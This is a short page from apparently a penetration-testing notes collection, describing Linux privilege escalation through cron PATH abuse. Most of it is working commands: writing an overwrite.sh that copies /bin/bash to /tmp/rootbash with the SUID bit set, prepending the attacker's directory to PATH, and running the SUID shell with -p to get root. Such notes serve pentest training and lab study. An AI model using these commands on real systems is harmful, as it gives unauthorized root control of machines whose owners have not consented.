PATH environment abuse 2

There is another way to escalate the privilege to root.

cat /etc/cron

You can add an additional PATH environment and create a new 'overwrite.sh' to run. 

# Target machine 
echo -e '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /home/bla/overwrite.sh

export PATH=/home/bla:$PATH

Once the /tmp/rootbash file is created, execute it (with -p to preserve the effective UID) to gain a root shell. 

/tmp/rootbash –p
PreviousPATH environment abuseNextWildcard and cronjob

Last updated